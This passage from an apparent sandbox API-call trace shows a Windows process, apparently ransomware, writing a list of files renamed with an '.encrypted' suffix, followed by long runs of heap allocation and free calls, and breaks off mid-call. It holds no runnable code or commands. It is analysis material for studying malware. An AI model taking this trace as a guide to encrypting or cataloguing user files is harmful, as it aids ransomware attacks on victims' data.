lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0039.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab380 [0039.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.encrypted.png\r\n", cchWideChar=61, lpMultiByteStr=0x7ab380, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 61 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.351] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3c, lpOverlapped=0x0) returned 1 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.351] CloseHandle (hObject=0x128) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.352] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.352] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.354] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.354] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.357] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.359] LoadLibraryW 